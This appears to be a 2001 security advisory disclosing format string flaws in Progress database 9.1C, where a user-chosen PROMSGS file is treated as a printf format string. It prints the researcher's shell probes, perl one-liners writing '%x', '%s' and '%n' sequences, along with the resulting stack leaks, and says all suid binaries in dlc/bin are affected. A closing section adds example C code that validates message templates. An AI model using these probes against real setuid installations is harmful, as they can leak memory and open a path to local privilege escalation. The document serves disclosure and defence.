5th Nov 2001 [SBWID-4840]
COMMAND
Progress database (format string overflow)
SYSTEMS AFFECTED
PROGRESS Version 9.1C
PROBLEM
KF <dotslash@snosoft.com> found the following:
Well once again I have found yet another Progress database issue. The
PROMSGS has been looked at one time already for buffer overflows. It
was supposed to be fixed. I was poking around at it today and noticed
these format string issues... PROGRESS Version 9.1C as of Thu Jun 7
10:03:59 EDT 2001
First test with a malformed PROMSGS.
[elguapo@linux bin]$ echo blah > file
[elguapo@linux bin]$ export PROMSGS=./file
[elguapo@linux bin]$ ./_probuild
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 290
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 96
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 6063
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 24
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 912
Test to make sure they fixed my original hole with the buffer
overflows. (looks fine)
[elguapo@linux bin]$ echo `perl -e 'print "A" x 20000'` > file
[elguapo@linux bin]$ ./_probuild
Error formatting messaage 96. Message file is corrupt.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 6063
Error formatting messaage 24. Message file is corrupt.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 912
Well if you use a format string instead of an A we get much better
results.
[elguapo@linux bin]$ echo `perl -e 'print "%x" x 9000'` > file
[elguapo@linux bin]$ ./_probuild
Error formatting messaage 96. Message file is corrupt.
0x00x00x3e0x83c63500xbffff81c0x10x00x8062d350x3cc6140x00xbffffd4f0x782578250x782578250x782578250x782578250x782578250x782578250x782578250xbffff8250xbffff7340x80618450x00x83e3ec00x83e3ec00x83c7b200x900x83c63500xbffff81c0x10xbffff66c0x00x401e5f2c0x10000x401e44a00xbffff6680x4013f2bd0x10000x401e5f2c0xbffff7180x4013f2aa%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 6063
Error formatting messaage 24. Message file is corrupt.
0x837a70e0x83c63500x83e970c0x00xbffff6240x807784b0x40x83e95b00x83c63500xbffff81c0x00x202020200x00x323532390x202020360x525820200x584852410x4d4136500x59444d4d0x5148004d0xbffff5440x83e3ec00xbffff6c40x83166430xbffff5440xbffff6040xc00xbffff5440x83e3ec00xbffff5440x83e3ec00x83c63500x00x83e3ec00x50x2000x8a0xbffff5ad0x920xbffff56d%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 912
[elguapo@linux bin]$ echo `perl -e 'print "%s" x 9000'` > file
[elguapo@linux bin]$ ./_probuild
Error formatting messaage 96. Message file is corrupt.
Error formatting messaage 49. Message file is corrupt.
Error formatting messaage 49. Message file is corrupt.
Error formatting messaage 49. Message file is corrupt.
Error formatting messaage 49. Message file is corrupt.
Error formatting messaage 49. Message file is corrupt.
Error formatting messaage 49. Message file is corrupt.
Error formatting messaage 49. Message file is corrupt.
Error formatting messaage 49. Message file is corrupt.
Error formatting messaage 49. Message file is corrupt.
Error formatting messaage 49. Message file is corrupt.
rcurctr overflow reading promsgs file.
(note the overflow msg)
[elguapo@linux bin]$ echo `perl -e 'print "%n" x 9000'` > file
[elguapo@linux bin]$ ./_probuild
Error formatting messaage 96. Message file is corrupt.
0(tty)0(tty)6225424-20201(tty)0(tty)11573-148280(tty)-68928197281972819728197281972819728197-2011-225262130(tty)16064160643152014425424-20201(tty)-24520(tty)24364409617568-2456-3395409624364-2280-3414%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 6063
Error formatting messaage 24. Message file is corrupt.
-2277025424-268680(tty)-2524307954-2721625424-20200(tty)82240(tty)128578246822421057139041978977-274816064-236426179-2748-2556192-274816064-274816064254240(tty)160645512138-2643146-2707%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 912
ALL suids in the dlc/bin dir are affected
SOLUTION
Nothing yet.
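The runs above show text from a user-selected PROMSGS file being interpreted as a printf-style format string. The following is an added example, not code from the advisory or from Progress: one way a program can check a catalog template against the conversions it expects before formatting with it. The function names, the "sd" signature notation and the sample templates are assumptions constructed for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical helper (not Progress code). Returns 1 only if tmpl, a message
 * template read from an untrusted catalog file, contains exactly the
 * conversions listed in expected, in order ("sd" = one %s then one %d).
 * Flags, widths, length modifiers, %n and surplus conversions are rejected. */
int template_matches(const char *tmpl, const char *expected)
{
    size_t used = 0, n = strlen(expected);

    for (const char *p = tmpl; *p; p++) {
        if (*p != '%')
            continue;
        p++;                          /* look at the conversion character */
        if (*p == '%')
            continue;                 /* "%%" is a literal percent sign */
        if (*p == '\0')
            return 0;                 /* dangling '%' at end of template */
        if (used >= n || *p != expected[used])
            return 0;                 /* unexpected or extra conversion */
        used++;
    }
    return used == n;                 /* every expected argument is consumed */
}

/* Formats message text for (name, code). The catalog template is used only
 * if it passes the check; otherwise the compiled-in fallback is used. */
int format_message(char *out, size_t outlen, const char *tmpl,
                   const char *name, int code)
{
    static const char fallback[] = "Unable to format message %s (%d)";
    const char *fmt = template_matches(tmpl, "sd") ? tmpl : fallback;

    return snprintf(out, outlen, fmt, name, code);
}

int main(void)
{
    /* Constructed sample templates, not taken from a real PROMSGS file. */
    const char *samples[] = { "Cannot open %s (errno=%d)", "%x%x%x%x", "%n%n" };
    char buf[128];

    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        format_message(buf, sizeof buf, samples[i], "promsgs", 96);
        puts(buf);
    }
    return 0;
}
```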